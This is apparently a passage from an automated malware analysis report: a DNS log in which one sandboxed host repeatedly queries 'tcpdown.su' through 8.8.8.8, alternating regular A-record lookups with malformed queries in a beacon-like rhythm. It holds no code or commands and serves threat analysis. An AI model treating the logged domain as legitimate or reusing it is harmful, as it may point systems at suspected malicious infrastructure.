          Jan 1, 2025 15:07:39.793178082 CET5728553192.168.2.138.8.8.8
          Jan 1, 2025 15:07:39.799659967 CET53572858.8.8.8192.168.2.13
          Jan 1, 2025 15:07:39.800559044 CET4166353192.168.2.138.8.8.8
          Jan 1, 2025 15:07:39.807100058 CET53416638.8.8.8192.168.2.13
          Jan 1, 2025 15:07:39.807900906 CET5994553192.168.2.138.8.8.8
          Jan 1, 2025 15:07:39.814228058 CET53599458.8.8.8192.168.2.13
          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
          Jan 1, 2025 15:06:44.631438971 CET192.168.2.138.8.8.80xf887Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:44.655358076 CET192.168.2.138.8.8.80xe7f3Standard query (0)tcpdown.su|!A (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:44.669625044 CET192.168.2.138.8.8.80xe7f3Standard query (0)tcpdown.su|!A (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:44.679519892 CET192.168.2.138.8.8.80xe7f3Standard query (0)tcpdown.su|!A (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:44.696474075 CET192.168.2.138.8.8.80xe7f3Standard query (0)tcpdown.su|!A (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:44.706196070 CET192.168.2.138.8.8.80xe7f3Standard query (0)tcpdown.su|!A (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:46.279680967 CET192.168.2.138.8.8.80xb137Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:46.319535971 CET192.168.2.138.8.8.80xb137Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:46.334754944 CET192.168.2.138.8.8.80xb137Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:46.349328041 CET192.168.2.138.8.8.80xb137Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:46.361438036 CET192.168.2.138.8.8.80xb137Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:46.373644114 CET192.168.2.138.8.8.80xfd2cStandard query (0)tcpdown.suo. [malformed]256502false
          Jan 1, 2025 15:06:46.385796070 CET192.168.2.138.8.8.80xfd2cStandard query (0)tcpdown.suo. [malformed]256502false
          Jan 1, 2025 15:06:46.397631884 CET192.168.2.138.8.8.80xfd2cStandard query (0)tcpdown.suo. [malformed]256502false
          Jan 1, 2025 15:06:46.407444000 CET192.168.2.138.8.8.80xfd2cStandard query (0)tcpdown.suo. [malformed]256502false
          Jan 1, 2025 15:06:46.419904947 CET192.168.2.138.8.8.80xfd2cStandard query (0)tcpdown.suo. [malformed]256502false
          Jan 1, 2025 15:06:48.094619036 CET192.168.2.138.8.8.80x4811Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:48.105258942 CET192.168.2.138.8.8.80x4811Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:48.116123915 CET192.168.2.138.8.8.80x4811Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:48.125381947 CET192.168.2.138.8.8.80x4811Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:48.135723114 CET192.168.2.138.8.8.80x4811Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:48.146173000 CET192.168.2.138.8.8.80x7974Standard query (0)tcpdown.suo. [malformed]256504false
          Jan 1, 2025 15:06:48.155339956 CET192.168.2.138.8.8.80x7974Standard query (0)tcpdown.suo. [malformed]256504false
          Jan 1, 2025 15:06:48.165231943 CET192.168.2.138.8.8.80x7974Standard query (0)tcpdown.suo. [malformed]256504false
          Jan 1, 2025 15:06:48.174057007 CET192.168.2.138.8.8.80x7974Standard query (0)tcpdown.suo. [malformed]256504false
          Jan 1, 2025 15:06:48.183614016 CET192.168.2.138.8.8.80x7974Standard query (0)tcpdown.suo. [malformed]256504false
          Jan 1, 2025 15:06:49.857047081 CET192.168.2.138.8.8.80x3da3Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:49.865537882 CET192.168.2.138.8.8.80x3da3Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:49.874212980 CET192.168.2.138.8.8.80x3da3Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:49.893115044 CET192.168.2.138.8.8.80x3da3Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:49.904336929 CET192.168.2.138.8.8.80x3da3Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:49.914508104 CET192.168.2.138.8.8.80xf3edStandard query (0)tcpdown.suo. [malformed]256505false
          Jan 1, 2025 15:06:49.923851967 CET192.168.2.138.8.8.80xf3edStandard query (0)tcpdown.suo. [malformed]256505false
          Jan 1, 2025 15:06:49.932507992 CET192.168.2.138.8.8.80xf3edStandard query (0)tcpdown.suo. [malformed]256505false
          Jan 1, 2025 15:06:49.941334009 CET192.168.2.138.8.8.80xf3edStandard query (0)tcpdown.suo. [malformed]256505false
          Jan 1, 2025 15:06:49.951071978 CET192.168.2.138.8.8.80xf3edStandard query (0)tcpdown.suo. [malformed]256505false
          Jan 1, 2025 15:06:51.534771919 CET192.168.2.138.8.8.80x320fStandard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:51.544717073 CET192.168.2.138.8.8.80x320fStandard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:51.553981066 CET192.168.2.138.8.8.80x320fStandard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:51.563023090 CET192.168.2.138.8.8.80x320fStandard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:51.572566986 CET192.168.2.138.8.8.80x320fStandard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:51.582587957 CET192.168.2.138.8.8.80x7916Standard query (0)tcpdown.suo. [malformed]256507false
          Jan 1, 2025 15:06:51.591182947 CET192.168.2.138.8.8.80x7916Standard query (0)tcpdown.suo. [malformed]256507false
          Jan 1, 2025 15:06:51.600466013 CET192.168.2.138.8.8.80x7916Standard query (0)tcpdown.suo. [malformed]256507false
          Jan 1, 2025 15:06:51.609011889 CET192.168.2.138.8.8.80x7916Standard query (0)tcpdown.suo. [malformed]256507false
          Jan 1, 2025 15:06:51.617734909 CET192.168.2.138.8.8.80x7916Standard query (0)tcpdown.suo. [malformed]256507false
          Jan 1, 2025 15:06:53.204931974 CET192.168.2.138.8.8.80xc176Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:53.214077950 CET192.168.2.138.8.8.80xc176Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:53.222831964 CET192.168.2.138.8.8.80xc176Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:53.231009007 CET192.168.2.138.8.8.80xc176Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:53.239341021 CET192.168.2.138.8.8.80xc176Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:53.248296022 CET192.168.2.138.8.8.80x78a9Standard query (0)tcpdown.suo. [malformed]256509false
          Jan 1, 2025 15:06:53.256028891 CET192.168.2.138.8.8.80x78a9Standard query (0)tcpdown.suo. [malformed]256509false
          Jan 1, 2025 15:06:53.265050888 CET192.168.2.138.8.8.80x78a9Standard query (0)tcpdown.suo. [malformed]256509false
          Jan 1, 2025 15:06:53.273600101 CET192.168.2.138.8.8.80x78a9Standard query (0)tcpdown.suo. [malformed]256509false
          Jan 1, 2025 15:06:53.281610012 CET192.168.2.138.8.8.80x78a9Standard query (0)tcpdown.suo. [malformed]256509false
          Jan 1, 2025 15:06:54.864587069 CET192.168.2.138.8.8.80x85a1Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:54.872353077 CET192.168.2.138.8.8.80x85a1Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:54.881108999 CET192.168.2.138.8.8.80x85a1Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:54.891069889 CET192.168.2.138.8.8.80x85a1Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:54.900723934 CET192.168.2.138.8.8.80x85a1Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:54.910753012 CET192.168.2.138.8.8.80xb78cStandard query (0)tcpdown.suo. [malformed]256510false
          Jan 1, 2025 15:06:54.919616938 CET192.168.2.138.8.8.80xb78cStandard query (0)tcpdown.suo. [malformed]256510false
          Jan 1, 2025 15:06:54.928401947 CET192.168.2.138.8.8.80xb78cStandard query (0)tcpdown.suo. [malformed]256510false
          Jan 1, 2025 15:06:54.936517954 CET192.168.2.138.8.8.80xb78cStandard query (0)tcpdown.suo. [malformed]256510false
          Jan 1, 2025 15:06:54.945517063 CET192.168.2.138.8.8.80xb78cStandard query (0)tcpdown.suo. [malformed]256510false
          Jan 1, 2025 15:06:56.531925917 CET192.168.2.138.8.8.80x4b9bStandard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:56.542341948 CET192.168.2.138.8.8.80x4b9bStandard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:56.550672054 CET192.168.2.138.8.8.80x4b9bStandard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:56.558455944 CET192.168.2.138.8.8.80x4b9bStandard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:56.572464943 CET192.168.2.138.8.8.80x4b9bStandard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:56.580355883 CET192.168.2.138.8.8.80xaadaStandard query (0)tcpdown.suo. [malformed]256256false
          Jan 1, 2025 15:06:56.587804079 CET192.168.2.138.8.8.80xaadaStandard query (0)tcpdown.suo. [malformed]256256false
          Jan 1, 2025 15:06:56.594813108 CET192.168.2.138.8.8.80xaadaStandard query (0)tcpdown.suo. [malformed]256256false
          Jan 1, 2025 15:06:56.603068113 CET192.168.2.138.8.8.80xaadaStandard query (0)tcpdown.suo. [malformed]256256false
          Jan 1, 2025 15:06:56.611048937 CET192.168.2.138.8.8.80xaadaStandard query (0)tcpdown.suo. [malformed]256256false
          Jan 1, 2025 15:06:58.194770098 CET192.168.2.138.8.8.80xd655Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:58.208967924 CET192.168.2.138.8.8.80xd655Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:58.219881058 CET192.168.2.138.8.8.80xd655Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:58.232361078 CET192.168.2.138.8.8.80xd655Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:58.246321917 CET192.168.2.138.8.8.80xd655Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:58.260449886 CET192.168.2.138.8.8.80x2689Standard query (0)tcpdown.suo. [malformed]256258false
          Jan 1, 2025 15:06:58.268718004 CET192.168.2.138.8.8.80x2689Standard query (0)tcpdown.suo. [malformed]256258false
          Jan 1, 2025 15:06:58.277060986 CET192.168.2.138.8.8.80x2689Standard query (0)tcpdown.suo. [malformed]256258false
          Jan 1, 2025 15:06:58.286596060 CET192.168.2.138.8.8.80x2689Standard query (0)tcpdown.suo. [malformed]256258false
          Jan 1, 2025 15:06:58.295608044 CET192.168.2.138.8.8.80x2689Standard query (0)tcpdown.suo. [malformed]256258false
          Jan 1, 2025 15:06:59.893431902 CET192.168.2.138.8.8.80x48d3Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:59.904910088 CET192.168.2.138.8.8.80x48d3Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:59.916651011 CET192.168.2.138.8.8.80x48d3Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:59.927191019 CET192.168.2.138.8.8.80x48d3Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:59.940053940 CET192.168.2.138.8.8.80x48d3Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:06:59.950978994 CET192.168.2.138.8.8.80x5162Standard query (0)tcpdown.suo. [malformed]256259false
          Jan 1, 2025 15:06:59.960387945 CET192.168.2.138.8.8.80x5162Standard query (0)tcpdown.suo. [malformed]256259false
          Jan 1, 2025 15:06:59.969798088 CET192.168.2.138.8.8.80x5162Standard query (0)tcpdown.suo. [malformed]256259false
          Jan 1, 2025 15:06:59.978646994 CET192.168.2.138.8.8.80x5162Standard query (0)tcpdown.suo. [malformed]256259false
          Jan 1, 2025 15:06:59.987724066 CET192.168.2.138.8.8.80x5162Standard query (0)tcpdown.suo. [malformed]256259false
          Jan 1, 2025 15:07:01.549685001 CET192.168.2.138.8.8.80x1e69Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:01.558537006 CET192.168.2.138.8.8.80x1e69Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:01.568269968 CET192.168.2.138.8.8.80x1e69Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:01.576844931 CET192.168.2.138.8.8.80x1e69Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:01.585144043 CET192.168.2.138.8.8.80x1e69Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:01.595405102 CET192.168.2.138.8.8.80x685bStandard query (0)tcpdown.suo. [malformed]256261false
          Jan 1, 2025 15:07:01.675209045 CET192.168.2.138.8.8.80x685bStandard query (0)tcpdown.suo. [malformed]256261false
          Jan 1, 2025 15:07:01.774259090 CET192.168.2.138.8.8.80x685bStandard query (0)tcpdown.suo. [malformed]256261false
          Jan 1, 2025 15:07:01.781538963 CET192.168.2.138.8.8.80x685bStandard query (0)tcpdown.suo. [malformed]256261false
          Jan 1, 2025 15:07:01.790283918 CET192.168.2.138.8.8.80x685bStandard query (0)tcpdown.suo. [malformed]256261false
          Jan 1, 2025 15:07:03.352343082 CET192.168.2.138.8.8.80x2786Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:03.360321999 CET192.168.2.138.8.8.80x2786Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:03.368068933 CET192.168.2.138.8.8.80x2786Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:03.376576900 CET192.168.2.138.8.8.80x2786Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:03.384486914 CET192.168.2.138.8.8.80x2786Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:03.392251015 CET192.168.2.138.8.8.80x8f7Standard query (0)tcpdown.suo. [malformed]256263false
          Jan 1, 2025 15:07:03.399105072 CET192.168.2.138.8.8.80x8f7Standard query (0)tcpdown.suo. [malformed]256263false
          Jan 1, 2025 15:07:03.406151056 CET192.168.2.138.8.8.80x8f7Standard query (0)tcpdown.suo. [malformed]256263false
          Jan 1, 2025 15:07:03.413407087 CET192.168.2.138.8.8.80x8f7Standard query (0)tcpdown.suo. [malformed]256263false
          Jan 1, 2025 15:07:03.420270920 CET192.168.2.138.8.8.80x8f7Standard query (0)tcpdown.suo. [malformed]256263false
          Jan 1, 2025 15:07:04.976028919 CET192.168.2.138.8.8.80xce89Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:04.983959913 CET192.168.2.138.8.8.80xce89Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:04.991678953 CET192.168.2.138.8.8.80xce89Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:04.999485016 CET192.168.2.138.8.8.80xce89Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:05.007421017 CET192.168.2.138.8.8.80xce89Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:05.015383005 CET192.168.2.138.8.8.80xedd3Standard query (0)tcpdown.suo. [malformed]256265false
          Jan 1, 2025 15:07:05.022687912 CET192.168.2.138.8.8.80xedd3Standard query (0)tcpdown.suo. [malformed]256265false
          Jan 1, 2025 15:07:05.031224966 CET192.168.2.138.8.8.80xedd3Standard query (0)tcpdown.suo. [malformed]256265false
          Jan 1, 2025 15:07:05.038367033 CET192.168.2.138.8.8.80xedd3Standard query (0)tcpdown.suo. [malformed]256265false
          Jan 1, 2025 15:07:05.045628071 CET192.168.2.138.8.8.80xedd3Standard query (0)tcpdown.suo. [malformed]256265false
          Jan 1, 2025 15:07:06.603286028 CET192.168.2.138.8.8.80x2db5Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:06.611406088 CET192.168.2.138.8.8.80x2db5Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:06.626187086 CET192.168.2.138.8.8.80x2db5Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:06.634507895 CET192.168.2.138.8.8.80x2db5Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:06.642321110 CET192.168.2.138.8.8.80x2db5Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:06.649960995 CET192.168.2.138.8.8.80xbd7cStandard query (0)tcpdown.suo. [malformed]256266false
          Jan 1, 2025 15:07:06.657248974 CET192.168.2.138.8.8.80xbd7cStandard query (0)tcpdown.suo. [malformed]256266false
          Jan 1, 2025 15:07:06.665498972 CET192.168.2.138.8.8.80xbd7cStandard query (0)tcpdown.suo. [malformed]256266false
          Jan 1, 2025 15:07:06.672698021 CET192.168.2.138.8.8.80xbd7cStandard query (0)tcpdown.suo. [malformed]256266false
          Jan 1, 2025 15:07:06.679896116 CET192.168.2.138.8.8.80xbd7cStandard query (0)tcpdown.suo. [malformed]256266false
          Jan 1, 2025 15:07:08.268204927 CET192.168.2.138.8.8.80x2af0Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:08.276313066 CET192.168.2.138.8.8.80x2af0Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:08.284002066 CET192.168.2.138.8.8.80x2af0Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:08.292572975 CET192.168.2.138.8.8.80x2af0Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:08.302175045 CET192.168.2.138.8.8.80x2af0Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:08.309892893 CET192.168.2.138.8.8.80x3c31Standard query (0)tcpdown.suo. [malformed]256268false
          Jan 1, 2025 15:07:08.316940069 CET192.168.2.138.8.8.80x3c31Standard query (0)tcpdown.suo. [malformed]256268false
          Jan 1, 2025 15:07:08.324088097 CET192.168.2.138.8.8.80x3c31Standard query (0)tcpdown.suo. [malformed]256268false
          Jan 1, 2025 15:07:08.331382036 CET192.168.2.138.8.8.80x3c31Standard query (0)tcpdown.suo. [malformed]256268false
          Jan 1, 2025 15:07:08.338691950 CET192.168.2.138.8.8.80x3c31Standard query (0)tcpdown.suo. [malformed]256268false
          Jan 1, 2025 15:07:09.938019991 CET192.168.2.138.8.8.80x1aa1Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:09.952773094 CET192.168.2.138.8.8.80x1aa1Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:09.960671902 CET192.168.2.138.8.8.80x1aa1Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:09.969371080 CET192.168.2.138.8.8.80x1aa1Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:09.981895924 CET192.168.2.138.8.8.80x1aa1Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:09.990401030 CET192.168.2.138.8.8.80x2f49Standard query (0)tcpdown.suo. [malformed]256269false
          Jan 1, 2025 15:07:09.997394085 CET192.168.2.138.8.8.80x2f49Standard query (0)tcpdown.suo. [malformed]256270false
          Jan 1, 2025 15:07:10.004626989 CET192.168.2.138.8.8.80x2f49Standard query (0)tcpdown.suo. [malformed]256270false
          Jan 1, 2025 15:07:10.011722088 CET192.168.2.138.8.8.80x2f49Standard query (0)tcpdown.suo. [malformed]256270false
          Jan 1, 2025 15:07:10.018913984 CET192.168.2.138.8.8.80x2f49Standard query (0)tcpdown.suo. [malformed]256270false
          Jan 1, 2025 15:07:11.608403921 CET192.168.2.138.8.8.80x9a89Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:11.616652012 CET192.168.2.138.8.8.80x9a89Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:11.624285936 CET192.168.2.138.8.8.80x9a89Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:11.632241964 CET192.168.2.138.8.8.80x9a89Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:11.640289068 CET192.168.2.138.8.8.80x9a89Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:11.648102045 CET192.168.2.138.8.8.80x1984Standard query (0)tcpdown.suo. [malformed]256271false
          Jan 1, 2025 15:07:11.656558037 CET192.168.2.138.8.8.80x1984Standard query (0)tcpdown.suo. [malformed]256271false
          Jan 1, 2025 15:07:11.663995981 CET192.168.2.138.8.8.80x1984Standard query (0)tcpdown.suo. [malformed]256271false
          Jan 1, 2025 15:07:11.671125889 CET192.168.2.138.8.8.80x1984Standard query (0)tcpdown.suo. [malformed]256271false
          Jan 1, 2025 15:07:11.678425074 CET192.168.2.138.8.8.80x1984Standard query (0)tcpdown.suo. [malformed]256271false
          Jan 1, 2025 15:07:13.232737064 CET192.168.2.138.8.8.80x45c7Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:13.240437031 CET192.168.2.138.8.8.80x45c7Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:13.247997999 CET192.168.2.138.8.8.80x45c7Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:13.255707979 CET192.168.2.138.8.8.80x45c7Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:13.263706923 CET192.168.2.138.8.8.80x45c7Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:13.271496058 CET192.168.2.138.8.8.80x91bfStandard query (0)tcpdown.suo. [malformed]256273false
          Jan 1, 2025 15:07:13.278552055 CET192.168.2.138.8.8.80x91bfStandard query (0)tcpdown.suo. [malformed]256273false
          Jan 1, 2025 15:07:13.285805941 CET192.168.2.138.8.8.80x91bfStandard query (0)tcpdown.suo. [malformed]256273false
          Jan 1, 2025 15:07:13.292726040 CET192.168.2.138.8.8.80x91bfStandard query (0)tcpdown.suo. [malformed]256273false
          Jan 1, 2025 15:07:13.299747944 CET192.168.2.138.8.8.80x91bfStandard query (0)tcpdown.suo. [malformed]256273false
          Jan 1, 2025 15:07:14.888408899 CET192.168.2.138.8.8.80x2972Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:14.896267891 CET192.168.2.138.8.8.80x2972Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:14.904524088 CET192.168.2.138.8.8.80x2972Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:14.912623882 CET192.168.2.138.8.8.80x2972Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:14.920348883 CET192.168.2.138.8.8.80x2972Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:14.928273916 CET192.168.2.138.8.8.80x3d49Standard query (0)tcpdown.suo. [malformed]256274false
          Jan 1, 2025 15:07:14.939435959 CET192.168.2.138.8.8.80x3d49Standard query (0)tcpdown.suo. [malformed]256274false
          Jan 1, 2025 15:07:14.946732998 CET192.168.2.138.8.8.80x3d49Standard query (0)tcpdown.suo. [malformed]256274false
          Jan 1, 2025 15:07:14.954582930 CET192.168.2.138.8.8.80x3d49Standard query (0)tcpdown.suo. [malformed]256274false
          Jan 1, 2025 15:07:14.961636066 CET192.168.2.138.8.8.80x3d49Standard query (0)tcpdown.suo. [malformed]256274false
          Jan 1, 2025 15:07:16.496642113 CET192.168.2.138.8.8.80xd348Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:16.505904913 CET192.168.2.138.8.8.80xd348Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:16.513978004 CET192.168.2.138.8.8.80xd348Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:16.522221088 CET192.168.2.138.8.8.80xd348Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:16.531166077 CET192.168.2.138.8.8.80xd348Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:16.538992882 CET192.168.2.138.8.8.80x61d0Standard query (0)tcpdown.suo. [malformed]256276false
          Jan 1, 2025 15:07:16.545959949 CET192.168.2.138.8.8.80x61d0Standard query (0)tcpdown.suo. [malformed]256276false
          Jan 1, 2025 15:07:16.554600954 CET192.168.2.138.8.8.80x61d0Standard query (0)tcpdown.suo. [malformed]256276false
          Jan 1, 2025 15:07:16.561774969 CET192.168.2.138.8.8.80x61d0Standard query (0)tcpdown.suo. [malformed]256276false
          Jan 1, 2025 15:07:16.570272923 CET192.168.2.138.8.8.80x61d0Standard query (0)tcpdown.suo. [malformed]256276false
          Jan 1, 2025 15:07:18.156457901 CET192.168.2.138.8.8.80x96dcStandard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:18.164170980 CET192.168.2.138.8.8.80x96dcStandard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:18.172430992 CET192.168.2.138.8.8.80x96dcStandard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:18.180038929 CET192.168.2.138.8.8.80x96dcStandard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:18.187463999 CET192.168.2.138.8.8.80x96dcStandard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:18.201391935 CET192.168.2.138.8.8.80x984fStandard query (0)tcpdown.suo. [malformed]256278false
          Jan 1, 2025 15:07:18.208421946 CET192.168.2.138.8.8.80x984fStandard query (0)tcpdown.suo. [malformed]256278false
          Jan 1, 2025 15:07:18.215488911 CET192.168.2.138.8.8.80x984fStandard query (0)tcpdown.suo. [malformed]256278false
          Jan 1, 2025 15:07:18.222553968 CET192.168.2.138.8.8.80x984fStandard query (0)tcpdown.suo. [malformed]256278false
          Jan 1, 2025 15:07:18.229923010 CET192.168.2.138.8.8.80x984fStandard query (0)tcpdown.suo. [malformed]256278false
          Jan 1, 2025 15:07:19.800267935 CET192.168.2.138.8.8.80x6efdStandard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:19.807985067 CET192.168.2.138.8.8.80x6efdStandard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:19.816037893 CET192.168.2.138.8.8.80x6efdStandard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:19.823559046 CET192.168.2.138.8.8.80x6efdStandard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:19.831161976 CET192.168.2.138.8.8.80x6efdStandard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:19.838664055 CET192.168.2.138.8.8.80x89a3Standard query (0)tcpdown.suo. [malformed]256279false
          Jan 1, 2025 15:07:19.845904112 CET192.168.2.138.8.8.80x89a3Standard query (0)tcpdown.suo. [malformed]256279false
          Jan 1, 2025 15:07:19.852794886 CET192.168.2.138.8.8.80x89a3Standard query (0)tcpdown.suo. [malformed]256279false
          Jan 1, 2025 15:07:19.859877110 CET192.168.2.138.8.8.80x89a3Standard query (0)tcpdown.suo. [malformed]256279false
          Jan 1, 2025 15:07:19.866636038 CET192.168.2.138.8.8.80x89a3Standard query (0)tcpdown.suo. [malformed]256279false
          Jan 1, 2025 15:07:21.433852911 CET192.168.2.138.8.8.80x4e04Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
          Jan 1, 2025 15:07:21.441893101 CET192.168.2.138.8.8.80x4e04Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
